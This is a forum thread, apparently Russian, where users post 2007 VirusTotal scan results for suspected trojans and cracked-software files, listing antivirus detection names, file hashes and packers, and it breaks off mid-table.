*AntiVir	7.4.0.57/20070802	found [TR/Proxy.Small.DU.1300]*
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
*AVG	7.5.0.476/20070801	found [SHeur.DZI]*
BitDefender	7.2/20070802	found nothing
CAT-QuickHeal	9.00/20070801	found nothing
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070802	found nothing
*eSafe	7.0.15.0/20070731	found [Suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
*F-Secure	6.70.13030.0/20070802	found [Trojan-Proxy.Win32.Small.du]*
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
*Ikarus	T3.1.1.8/20070802	found [Trojan-Proxy.Win32.Small.DU]*
*Kaspersky	4.0.2.24/20070802	found [Trojan-Proxy.Win32.Small.du]*
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
Panda	9.0.0.4/20070802	found nothing
Prevx1	V2/20070802	found nothing
*Rising	19.34.30.00/20070802	found [Backdoor.Gpigeon.2006.ixo]*
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Win32.NewMalware.IM!31232!4]*

Complete scanning result of "d[1].exe", processed in VirusTotal at 08/02/2007 10:18:03 (CET).

[ file data ]
* name: d[1].exe
* size: 58880
* md5.: 1deb83fa1f3d96a0602e24d7e51bc773
* sha1: 923e878d9840ad23c42eb85a7dcb80c17349dc0b

[ scan result ]
AhnLab-V3	2007.8.2.0/20070802	found nothing
*AntiVir	7.4.0.57/20070802	found [TR/Obfuscated.GP.34]*
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
*AVG	7.5.0.476/20070801	found [Generic5.ZOC]*
BitDefender	7.2/20070802	found nothing
*CAT-QuickHeal	9.00/20070801	found [Trojan.Obfuscated.gp]*
ClamAV	0.91/20070801	found nothing
*DrWeb	4.33/20070802	found [Trojan.Swizzor]*
*eSafe	7.0.15.0/20070731	found [suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
*F-Secure	6.70.13030.0/20070802	found [Trojan.Win32.Obfuscated.gp]*
FileAdvisor	1/20070802	found nothing
*Fortinet	2.91.0.0/20070802	found [W32/Obfuscated.GP!tr]*
*Ikarus	T3.1.1.8/20070802	found [Trojan.Win32.Agent.alt]*
*Kaspersky	4.0.2.24/20070802	found [Trojan.Win32.Obfuscated.gp]*
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
*Panda	9.0.0.4/20070802	found [Trj/Downloader.PRL]*
*Prevx1	V2/20070802	found [Covert.Code]*
Rising	19.34.30.00/20070802	found nothing
Sophos	4.19.0/20070801	found nothing
*Sunbelt	2.2.907.0/20070802	found [Trojan.Win32.Obfuscated.gp]*
Symantec	10/20070802	found nothing
*TheHacker	6.1.7.160/20070801	found [Trojan/Obfuscated.gp]*
*VBA32	3.12.2.2/20070801	found [Trojan.Win32.Obfuscated.gp]*
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Trojan.Obfuscated.GP.34]*
[ notes ]
packers: UPX
packers: UPX
packers: UPX
Prevx info: http://fileinfo.prevx.com/fileinfo.a...2C0600176037C0


Complete scanning result of "n2_01_08_07_0[1].exe", processed in VirusTotal at 08/02/2007 09:56:49 (CET).

[ file data ]
* name: n2_01_08_07_0[1].exe
* size: 111104
* md5.: 1277ee6e1d1a7654ce2f64f2560f86b0
* sha1: 54ae7c104da54673352b780e9ba82e330de1d8cb

[ scan result ]
AhnLab-V3	2007.8.2.0/20070802	found nothing
*AntiVir	7.4.0.57/20070802	found [TR/Crypt.FKM.Gen]*
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
AVG	7.5.0.476/20070801	found nothing
BitDefender	7.2/20070802	found nothing
CAT-QuickHeal	9.00/20070801	found nothing
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070802	found nothing
*eSafe	7.0.15.0/20070731	found [suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
F-Secure	6.70.13030.0/20070802	found nothing
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
*Ikarus	T3.1.1.8/20070802	found [Trojan.Win32.Agent.alt]*
Kaspersky	4.0.2.24/20070802	found nothing
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
Panda	9.0.0.4/20070802	found nothing
Rising	19.34.30.00/20070802	found nothing
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Trojan.Crypt.FKM.Gen]*

[ notes ]
packers: UPX
packers: UPX
packers: UPX

and its twin brother:
Complete scanning result of "n2_31_07_07_0[1].exe", processed in VirusTotal at 08/02/2007 10:12:40 (CET).

[ file data ]
* name: n2_31_07_07_0[1].exe
* size: 104448
* md5.: 8e16588e88ac956e5720293fce7cadca
* sha1: 9e374ff120fae7a1ff613d8bb6b4e5f12c64c4df

[ scan result ]
 AhnLab-V3	2007.8.2.0/20070802	found nothing
*AntiVir	7.4.0.57/20070802	found [TR/Crypt.FKM.Gen]*
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
AVG	7.5.0.476/20070801	found nothing
*BitDefender	7.2/20070802	found [Trojan.Agent.ALT]*
CAT-QuickHeal	9.00/20070801	found nothing
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070802	found nothing
*eSafe	7.0.15.0/20070731	found [suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
F-Secure	6.70.13030.0/20070802	found nothing
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
*Ikarus	T3.1.1.8/20070802	found [Trojan.Win32.Agent.alt]*
Kaspersky	4.0.2.24/20070802	found nothing
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
*Panda	9.0.0.4/20070802	found [Suspicious file]*
*Prevx1	V2/20070802	found [Trojan.Nudos]*
Rising	19.34.30.00/20070802	found nothing
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Trojan.Crypt.FKM.Gen]*

[ notes ]
packers: UPX
packers: UPX
packers: UPX
Prevx info: http://fileinfo.prevx.com/fileinfo.a...791C004DCFD846

----------


## DoSTR

File KIS7-Crack.exe received on 08.02.2007 13:59:43 (CET)
Result: 10/31 (32.26%)

_Antivirus 	Version 	Last Update 	Result_
AhnLab-V3	2007.8.3.0	2007.08.02	-
*AntiVir	7.4.0.57	2007.08.02	TR/PSW.LDPinch.TAW.166*
Authentium	4.93.8	2007.08.02	-
Avast	4.7.1029.0	2007.08.02	-
*AVG	7.5.0.476	2007.08.01	Obfustat.EJN*
*BitDefender	7.2	2007.08.02	Trojan.PWS.LDPinch.TAW*
*CAT-QuickHeal	9.00	2007.08.01	(Suspicious) - DNAScan*
ClamAV	0.91	2007.08.01	-
*DrWeb	4.33	2007.08.02	Trojan.MulDrop.5888*
*eSafe	7.0.15.0	2007.07.31	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5026	2007.08.02	-
Ewido	4.0	2007.08.01	-
FileAdvisor	1	2007.08.02	-
Fortinet	2.91.0.0	2007.08.02	-
F-Prot	4.3.2.48	2007.08.01	-
F-Secure	6.70.13030.0	2007.08.02	-
*Ikarus	T3.1.1.8	2007.08.02	Trojan-PWS.LDPinch.TAW*
Kaspersky	4.0.2.24	2007.08.02	-
McAfee	5088	2007.08.01	-
Microsoft	1.2704	2007.08.02	-
NOD32v2	2432	2007.08.02	-
Norman	5.80.02	2007.08.02	-
Panda	9.0.0.4	2007.08.02	-
Rising	19.34.32.00	2007.08.02	-
Sophos	4.19.0	2007.08.01	-
*Sunbelt	2.2.907.0	2007.08.02	VIPRE.Suspicious*
Symantec	10	2007.08.02	-
TheHacker	6.1.7.160	2007.08.01	-
VBA32	3.12.2.2	2007.08.01	-
*VirusBuster	4.3.26:9	2007.08.02	Trojan.DR.Cimuz.Gen.1*
*Webwasher-Gateway	6.0.1	2007.08.02	Trojan.PSW.LDPinch.TAW.166*
Additional information
File size: 175012 bytes
MD5: 3b5f9cfe5fdbb0eea06d7b202d96fb1c
SHA1: 63bb9d9ea2f1e9fc1bc2a7773552a64a44039ad1
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## ISO

File php.exe received on 08.03.2007 05:07:25 (CET)
Current status: finished
Result:
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.3.0	2007.08.02	-
*AntiVir	7.4.0.57	2007.08.02	EXP/PhpBB.G
Authentium	4.93.8	2007.08.02	is a security risk or a "backdoor" program
Avast	4.7.1029.0	2007.08.02	Win32:PhpBB-C
AVG	7.5.0.476	2007.08.02	Potentially harmful program Exploit.XN*
*BitDefender	7.2	2007.08.03	Trojan.Exploit.Phpbb.G*
CAT-QuickHeal	9.00	2007.08.01	-
ClamAV	0.91	2007.08.02	-
DrWeb	4.33	2007.08.02	-
eSafe	7.0.15.0	2007.07.31	-
eTrust-Vet	31.1.5028	2007.08.03	-
*Ewido	4.0	2007.08.02	Not-A-Virus.Exploit.Win32.PhpBB.g*
FileAdvisor	1	2007.08.03	-
*Fortinet	2.91.0.0	2007.08.03	W32/PhpBB.G!exploit
F-Prot	4.3.2.48	2007.08.02	W32/Malware!f5d8
F-Secure	6.70.13030.0	2007.08.03	Exploit.Win32.PhpBB.g*
Ikarus	T3.1.1.8	2007.08.02	-
*Kaspersky	4.0.2.24	2007.08.03	Exploit.Win32.PhpBB.g
McAfee	5089	2007.08.02	Generic.cd
Microsoft	1.2704	2007.08.03	Exploit:Win32/PhpBB.E
NOD32v2	2434	2007.08.02	Win32/Exploit.PhpBB.G
Norman	5.80.02	2007.08.02	W32/Exploit.gen
Panda	9.0.0.4	2007.08.02	Trj/PhpBB.D
Rising	19.34.40.00	2007.08.03	Hack.Exploit.PHPBB.b*
Sophos	4.19.0	2007.08.01	-
Sunbelt	2.2.907.0	2007.08.03	-
*Symantec	10	2007.08.03	Hacktool*
TheHacker	6.1.7.160	2007.08.01	-
VBA32	3.12.2.2	2007.08.01	-
VirusBuster	4.3.26:9	2007.08.02	-
*Webwasher-Gateway	6.0.1	2007.08.03	Exploit.PhpBB.G*
Additional information
File size: 124416 bytes
MD5: 9e0841453b1385587d1da672acccd332
SHA1: 721ec2fe353ad47b2ff0d1ac1a523ee845475e97

----------


## zorro84

posted today on vozvrat.org:

Complete scanning result of "Dark.zip", processed in VirusTotal at 08/05/2007 16:06:47 (CET).

[ file data ]
* name: Dark.zip
* size: 1346581
* md5.: cdbcd32fc810066dab1f59ab8a5d7b3c
* sha1: 589c575681dce337cb3c5e6d27f88bebcd124d55

[ scan result ]
 AhnLab-V3      2007.8.3.0/20070803     found nothing
*AntiVir 7.4.0.57/20070803       found [HEUR/Crypted]*
Authentium      4.93.8/20070803 found nothing
Avast   4.7.1029.0/20070805     found nothing
AVG     7.5.0.476/20070804      found nothing
BitDefender     7.2/20070805    found nothing
*CAT-QuickHeal   9.00/20070804   found [Backdoor.SdBot.gen]*
ClamAV  0.91/20070805   found nothing
DrWeb   4.33/20070805   found nothing
eSafe   7.0.15.0/20070731       found nothing
eTrust-Vet      31.1.5032/20070804      found nothing
Ewido   4.0/20070803    found nothing
F-Prot  4.3.2.48/20070803       found nothing
F-Secure        6.70.13030.0/20070803   found nothing
FileAdvisor     1/20070805      found nothing
Fortinet        2.91.0.0/20070805       found nothing
*Ikarus  T3.1.1.8/20070805       found [Backdoor.VB.EV]*
Kaspersky       4.0.2.24/20070805       found nothing
McAfee  5090/20070803   found nothing
Microsoft       1.2704/20070805 found nothing
NOD32v2 2438/20070805   found nothing
Norman  5.80.02/20070803        found nothing
Panda   9.0.0.4/20070805        found nothing
Prevx1  V2/20070805     found nothing
Rising  19.34.40.00/20070803    found nothing
*Sophos  4.19.0/20070801 found [Mal/Basine-C]*
*Sunbelt 2.2.907.0/20070804      found [VIPRE.Suspicious]*
Symantec        10/20070805     found nothing
TheHacker       6.1.7.162/20070804      found nothing
VBA32   3.12.2.2/20070804       found nothing
VirusBuster     4.3.26:9/20070804       found nothing
*Webwasher-Gateway       6.0.1/20070803  found [Heuristic.Crypted]*

[ notes ]
packers: Themida
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## ISO

It was sitting in the root of the drive
File settings.exe received on 08.09.2007 12:37:23 (CET)
Current status:    finished 
Result: 18/32 (56.25%) 
Antivirus	Version	Last Update	Result
*AhnLab-V3	2007.8.9.2	2007.08.09	Win-Trojan/Polycrypt.35324
AntiVir	7.4.0.57	2007.08.09	TR/PCK.PolyCrypt.B.959*
Authentium	4.93.8	2007.08.08	-
Avast	4.7.1029.0	2007.08.08	-
*AVG	7.5.0.476	2007.08.08	Generic5.LZE
BitDefender	7.2	2007.08.09	Trojan.PWS.LDPinch.TAW
CAT-QuickHeal	9.00	2007.08.08	(Suspicious) - DNAScan*
ClamAV	0.91	2007.08.09	-
DrWeb	4.33	2007.08.09	-
*eSafe	7.0.15.0	2007.07.31	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5045	2007.08.09	-
Ewido	4.0	2007.08.08	-
FileAdvisor	1	2007.08.09	-
*Fortinet	2.91.0.0	2007.08.09	Basine.C*
F-Prot	4.3.2.48	2007.08.08	-
*F-Secure	6.70.13030.0	2007.08.09	Packed.Win32.PolyCrypt.b
Ikarus	T3.1.1.12	2007.08.09	Trojan-Downloader.Win32.Small.cyn
Kaspersky	4.0.2.24	2007.08.09	Packed.Win32.PolyCrypt.b*
McAfee	5093	2007.08.08	-
*Microsoft	1.2704	2007.08.09	TrojanDownloader:Win32/Small.CBA*
NOD32v2	2446	2007.08.09	-
Norman	5.80.02	2007.08.08	-
*Panda	9.0.0.4	2007.08.09	Trj/Ldpinch.AJB
Prevx1	V2	2007.08.09	TROJAN.PWDSTEALER.GEN
Rising	19.35.32.00	2007.08.09	Packer.RyCrypt
Sophos	4.19.0	2007.08.01	Mal/Basine-C
Sunbelt	2.2.907.0	2007.08.09	Trojan.Win32/Anomaly.gen!A*
Symantec	10	2007.08.09	-
TheHacker	6.1.7.166	2007.08.09	-
VBA32	3.12.2.2	2007.08.09	-
*VirusBuster	4.3.26:9	2007.08.08	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.08.09	Trojan.PCK.PolyCrypt.B.959*
Additional information
File size: 35324 bytes
MD5: 84657f739281112b73a4723a5fe4f5ad
SHA1: e9963b910eb4e27bfa29e47763fc7dad8909b582
packers: RCrypt
Prevx info: http://fileinfo.prevx.com/fileinfo.a...291200AFA27E6C

----------


## Winsent

File program.exe received on 08.09.2007 17:41:46 (CET)
Current status:     finished 
Result: 8/32 (25%)


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.8.9.2	2007.08.09	-
*AntiVir	7.4.0.57	2007.08.09	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.08.08	-
Avast	4.7.1029.0	2007.08.09	-
AVG	7.5.0.476	2007.08.08	-
BitDefender	7.2	2007.08.09	-
*CAT-QuickHeal	9.00	2007.08.09	(Suspicious) - DNAScan*
ClamAV	0.91	2007.08.09	-
DrWeb	4.33	2007.08.09	-
*eSafe	7.0.15.0	2007.07.31	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5045	2007.08.09	-
Ewido	4.0	2007.08.08	-
FileAdvisor	1	2007.08.09	-
Fortinet	2.91.0.0	2007.08.09	-
F-Prot	4.3.2.48	2007.08.08	-
*F-Secure	6.70.13030.0	2007.08.09	Trojan-Dropper.Win32.Agent.bog
Ikarus	T3.1.1.12	2007.08.09	Backdoor.Win32.Rbot
Kaspersky	4.0.2.24	2007.08.09	Trojan-Dropper.Win32.Agent.bog*
McAfee	5094	2007.08.09	-
Microsoft	1.2704	2007.08.09	-
NOD32v2	2446	2007.08.09	-
Norman	5.80.02	2007.08.08	-
*Panda	9.0.0.4	2007.08.09	Suspicious file*
Prevx1	V2	2007.08.09	-
Rising	19.35.33.00	2007.08.09	-
Sophos	4.19.0	2007.08.01	-
Sunbelt	2.2.907.0	2007.08.09	-
Symantec	10	2007.08.09	-
TheHacker	6.1.7.166	2007.08.09	-
VBA32	3.12.2.2	2007.08.09	-
VirusBuster	4.3.26:9	2007.08.09	-
*Webwasher-Gateway	6.0.1	2007.08.09	Trojan.Crypt.XPACK.Gen*
Additional information
File size: 181760 bytes
MD5: f6b1ddb2c5438f656f32feba729ec413
SHA1: bf271c984fd29d1561e4a6d575f9678068a3db48
packers: NTKrnl

----------


## urbanangel

File DVT.rar received on 08.10.2007 22:32:46 (CET)
Current status: finished
Result: 8/32 (25%)

Antivirus 	Version 	Last Update 	Result

AhnLab-V3	2007.8.9.2	2007.08.10	-
AntiVir	7.4.0.60	2007.08.10	-
Authentium	4.93.8	2007.08.10	-
*Avast	4.7.1029.0	2007.08.10	Win32:Trojan-gen. {UPX!}*
AVG	7.5.0.476	2007.08.10	-
*BitDefender	7.2	2007.08.10	Trojan.Bat.Agent.J*
CAT-QuickHeal	9.00	2007.08.10	-
ClamAV	0.91	2007.08.10	-
DrWeb	4.33	2007.08.10	-
*eSafe	7.0.15.0	2007.08.10	suspicious Trojan/Worm*
eTrust-Vet	31.1.5048	2007.08.10	-
*Ewido	4.0	2007.08.10	Trojan.Agent.j*
FileAdvisor	1	2007.08.10	-
Fortinet	2.91.0.0	2007.08.10	-
F-Prot	4.3.2.48	2007.08.10	-
F-Secure	6.70.13030.0	2007.08.10	-
*Ikarus	T3.1.1.12	2007.08.10	Trojan.BAT.Agent.j*
Kaspersky	4.0.2.24	2007.08.10	-
McAfee	5095	2007.08.10	-
*Microsoft	1.2704	2007.08.10	Trojan:Win32/Agent!6239*
NOD32v2	2450	2007.08.10	-
Norman	5.80.02	2007.08.10	-
Panda	9.0.0.4	2007.08.10	-
*Prevx1	V2	2007.08.10	Generic.Malware*
Rising	19.35.42.00	2007.08.10	-
Sophos	4.19.0	2007.08.01	-
Sunbelt	2.2.907.0	2007.08.10	-
Symantec	10	2007.08.10	-
TheHacker	6.1.7.166	2007.08.10	-
VBA32	3.12.2.2	2007.08.10	-
VirusBuster	4.3.26:9	2007.08.10	-
*Webwasher-Gateway	6.0.1	2007.08.10	Win32.ModifiedUPX.gen!90 (suspicious)*
Additional information
File size: 28728 bytes
MD5: c249b18860f4ea4f0adf3acbfdda978f
SHA1: 55ed9ef10f6ef6a31d75507ace3449e280bbfdf3
packers: UPX
packers: UPX, BINARYRES, UPX
packers: UPX
Prevx info: http://fileinfo.prevx.com/fileinfo.a...47000045C163CB

----------


## Синауридзе Александр

File realfoto.exe received on 08.12.2007 04:07:33 (CET)

Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.8.9.2	2007.08.10	-
*AntiVir	7.4.0.60	2007.08.10	TR/Dldr.Small.dru.2*
Authentium	4.93.8	2007.08.11	-
*Avast	4.7.1029.0	2007.08.11	Win32:Small-GYA*
AVG	7.5.0.476	2007.08.11	-
*BitDefender	7.2	2007.08.12	Trojan.Downloader.Small.AAED*
*CAT-QuickHeal	9.00	2007.08.11	(Suspicious) - DNAScan*
*ClamAV	0.91	2007.08.12	Trojan.Downloader-11693*
DrWeb	4.33	2007.08.11	-
eSafe	7.0.15.0	2007.08.10	-
eTrust-Vet	31.1.5050	2007.08.11	-
Ewido	4.0	2007.08.11	-
FileAdvisor	1	2007.08.12	-
*Fortinet	2.91.0.0	2007.08.12	W32/Small.EVT!tr.dldr*
F-Prot	4.3.2.48	2007.08.10	-
F-Secure	6.70.13030.0	2007.08.11	-
Ikarus	T3.1.1.12	2007.08.11	-
Kaspersky	4.0.2.24	2007.08.12	-
*McAfee	5095	2007.08.10	Generic Downloader*
*Microsoft	1.2704	2007.08.11	TrojanDownloader:Win32/Agent.WX*
*NOD32v2	2451	2007.08.11	probably a variant of Win32/TrojanDownloader.Small.DRU*
Norman	5.80.02	2007.08.10	-
*Panda	9.0.0.4	2007.08.11	Suspicious file*
Prevx1	V2	2007.08.12	-
Rising	19.35.52.00	2007.08.12	-
*Sophos	4.19.0	2007.08.01	Mal/Packer*
*Sunbelt	2.2.907.0	2007.08.11	VIPRE.Suspicious*
Symantec	10	2007.08.12	-
TheHacker	6.1.7.167	2007.08.12	-
VBA32	3.12.2.2	2007.08.11	-
VirusBuster	4.3.26:9	2007.08.11	-
*Webwasher-Gateway	6.0.1	2007.08.11	Trojan.Dldr.Small.dru.2*

Additional information
File size: 2613 bytes
MD5: 91458b170ac5877978041ffdd0082423
SHA1: 00abb5889f319268423e033e4a91bd50a40f828e
packers: FSG
packers: FSG
packers: FSG
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## sergio342

A fresh one. Yesterday only Kaspersky detected it, after I sent it in.

Antivirus Version Last Update Result 
AhnLab-V3 2007.8.15.0 2007.08.14 - 
*AntiVir 7.4.1.62 2007.08.14 TR/Agent.awu.3* 
Authentium 4.93.8 2007.08.14 - 
Avast 4.7.1029.0 2007.08.13 - 
*AVG 7.5.0.476 2007.08.14 Generic6.MJQ* 
BitDefender 7.2 2007.08.14 - 
CAT-QuickHeal 9.00 2007.08.14 - 
ClamAV 0.91 2007.08.14 - 
*DrWeb 4.33 2007.08.14 Win32.Tank* 
eSafe 7.0.15.0 2007.08.10 - 
eTrust-Vet 31.1.5058 2007.08.14 - 
Ewido 4.0 2007.08.14 - 
FileAdvisor 1 2007.08.14 - 
*Fortinet 2.91.0.0 2007.08.14 W32/Agent.AWU!tr* 
F-Prot 4.3.2.48 2007.08.14 - 
*F-Secure 6.70.13030.0 2007.08.14 Trojan.Win32.Agent.awu* 
Ikarus T3.1.1.12 2007.08.14 - 
*Kaspersky 4.0.2.24 2007.08.14 Trojan.Win32.Agent.awu* 
McAfee 5097 2007.08.14 - 
Microsoft 1.2704 2007.08.14 - 
NOD32v2 2460 2007.08.14 - 
Norman 5.80.02 2007.08.14 - 
Panda 9.0.0.4 2007.08.14 - 
Prevx1 V2 2007.08.14 - 
Rising 19.36.12.00 2007.08.14 - 
Sophos 4.20.0 2007.08.12 - 
Sunbelt 2.2.907.0 2007.08.14 - 
Symantec 10 2007.08.14 - 
TheHacker 6.1.8.168 2007.08.14 - 
VBA32 3.12.2.2 2007.08.13 - 
VirusBuster 4.3.26:9 2007.08.14 - 
*Webwasher-Gateway 6.0.1 2007.08.14 Trojan.Agent.awu.3* 

*Added 14 minutes later*

The same virus in another file.
File flashget.rar received on 08.14.2007 21:22:06 (CET)  

Antivirus Version Last Update Result 
AhnLab-V3 2007.8.15.0 2007.08.14 - 
AntiVir 7.4.1.62 2007.08.14 - 
Authentium 4.93.8 2007.08.14 - 
Avast 4.7.1029.0 2007.08.13 - 
AVG 7.5.0.476 2007.08.14 - 
BitDefender 7.2 2007.08.14 - 
CAT-QuickHeal 9.00 2007.08.14 - 
ClamAV 0.91 2007.08.14 - 
*DrWeb 4.33 2007.08.14 Win32.Tank* 
eSafe 7.0.15.0 2007.08.10 - 
eTrust-Vet 31.1.5058 2007.08.14 - 
Ewido 4.0 2007.08.14 - 
FileAdvisor 1 2007.08.14 - 
Fortinet 2.91.0.0 2007.08.14 - 
F-Prot 4.3.2.48 2007.08.14 - 
F-Secure 6.70.13030.0 2007.08.14 - 
Ikarus T3.1.1.12 2007.08.14 - 
Kaspersky 4.0.2.24 2007.08.14 - 
McAfee 5097 2007.08.14 - 
Microsoft 1.2704 2007.08.14 - 
NOD32v2 2460 2007.08.14 - 
Norman 5.80.02 2007.08.14 - 
Panda 9.0.0.4 2007.08.14 - 
Prevx1 V2 2007.08.14 - 
Rising 19.36.12.00 2007.08.14 - 
Sophos 4.20.0 2007.08.12 - 
Sunbelt 2.2.907.0 2007.08.14 - 
Symantec 10 2007.08.14 - 
TheHacker 6.1.8.168 2007.08.14 - 
VBA32 3.12.2.2 2007.08.13 - 
VirusBuster 4.3.26:9 2007.08.14 - 
Webwasher-Gateway 6.0.1 2007.08.14 -

*Added 1 minute later*

A file infected with this virus.
File regedit.exe received on 08.14.2007 21:23:02 (CET)

Antivirus Version Last Update Result 
AhnLab-V3 2007.8.15.0 2007.08.14 - 
AntiVir 7.4.1.62 2007.08.14 - 
Authentium 4.93.8 2007.08.14 - 
Avast 4.7.1029.0 2007.08.13 - 
AVG 7.5.0.476 2007.08.14 - 
BitDefender 7.2 2007.08.14 - 
CAT-QuickHeal 9.00 2007.08.14 - 
ClamAV 0.91 2007.08.14 - 
*DrWeb 4.33 2007.08.14 Win32.Tank* 
eSafe 7.0.15.0 2007.08.10 - 
eTrust-Vet 31.1.5058 2007.08.14 - 
Ewido 4.0 2007.08.14 - 
FileAdvisor 1 2007.08.14 - 
Fortinet 2.91.0.0 2007.08.14 - 
F-Prot 4.3.2.48 2007.08.14 - 
F-Secure 6.70.13030.0 2007.08.14 - 
Ikarus T3.1.1.12 2007.08.14 - 
Kaspersky 4.0.2.24 2007.08.14 - 
McAfee 5097 2007.08.14 - 
Microsoft 1.2704 2007.08.14 - 
NOD32v2 2460 2007.08.14 - 
Norman 5.80.02 2007.08.14 - 
Panda 9.0.0.4 2007.08.14 - 
Prevx1 V2 2007.08.14 - 
Rising 19.36.12.00 2007.08.14 - 
Sophos 4.20.0 2007.08.12 - 
Sunbelt 2.2.907.0 2007.08.14 - 
Symantec 10 2007.08.14 - 
TheHacker 6.1.8.168 2007.08.14 - 
VBA32 3.12.2.2 2007.08.13 - 
VirusBuster 4.3.26:9 2007.08.14 - 
Webwasher-Gateway 6.0.1 2007.08.14 -

----------


## Синауридзе Александр

File update.exe received on 08.15.2007 04:42:19 (CET)

Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.8.15.0	2007.08.14	-
AntiVir	7.4.1.62	2007.08.14	-
Authentium	4.93.8	2007.08.14	-
Avast	4.7.1029.0	2007.08.13	-
AVG	7.5.0.476	2007.08.14	-
BitDefender	7.2	2007.08.15	-
CAT-QuickHeal	9.00	2007.08.14	-
ClamAV	0.91	2007.08.14	-
DrWeb	4.33	2007.08.15	-
*eSafe	7.0.15.0	2007.08.10	suspicious Trojan/Worm*
eTrust-Vet	31.1.5058	2007.08.14	-
Ewido	4.0	2007.08.14	-
FileAdvisor	1	2007.08.15	-
Fortinet	2.91.0.0	2007.08.15	-
F-Prot	4.3.2.48	2007.08.14	-
F-Secure	6.70.13030.0	2007.08.15	-
Ikarus	T3.1.1.12	2007.08.14	-
Kaspersky	4.0.2.24	2007.08.15	-
McAfee	5097	2007.08.14	-
Microsoft	1.2704	2007.08.15	-
NOD32v2	2461	2007.08.15	-
Norman	5.80.02	2007.08.14	-
*Panda	9.0.0.4	2007.08.14	Suspicious file*
Prevx1	V2	2007.08.15	-
Rising	19.36.20.00	2007.08.15	-
Sophos	4.20.0	2007.08.12	-
Sunbelt	2.2.907.0	2007.08.14	-
Symantec	10	2007.08.15	-
TheHacker	6.1.8.168	2007.08.14	-
VBA32	3.12.2.2	2007.08.14	-
VirusBuster	4.3.26:9	2007.08.14	-
*Webwasher-Gateway	6.0.1	2007.08.14	Win32.ModifiedUPX.gen!84 (suspicious)*

Additional information
File size: 145408 bytes
MD5: b6d3fb3fbfc19566b80d57cce7d8d4bb
SHA1: de7eccba772e5537d9f61302373678183124e2d3
packers: UPX_LZMA

----------


## Shu_b

t 11753


```
File icf.exe received on 08.17.2007 12:15:20 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.15.0	2007.08.17	-
AntiVir	7.4.1.62	2007.08.17	-
Authentium	4.93.8	2007.08.17	-
Avast	4.7.1029.0	2007.08.16	-
AVG	7.5.0.476	2007.08.16	SHeur.GHC
BitDefender	7.2	2007.08.17	-
CAT-QuickHeal	9.00	2007.08.16	-
ClamAV	0.91	2007.08.16	-
DrWeb	4.33	2007.08.17	-
eSafe	7.0.15.0	2007.08.16	suspicious Trojan/Worm
eTrust-Vet	31.1.5067	2007.08.17	-
Ewido	4.0	2007.08.16	-
FileAdvisor	1	2007.08.17	-
Fortinet	2.91.0.0	2007.08.16	-
F-Prot	4.3.2.48	2007.08.16	-
F-Secure	6.70.13030.0	2007.08.17	-
Ikarus	T3.1.1.12	2007.08.17	Trojan.Win32.Agent.alt
Kaspersky	4.0.2.24	2007.08.17	-
McAfee	5099	2007.08.16	-
Microsoft	1.2803	2007.08.17	-
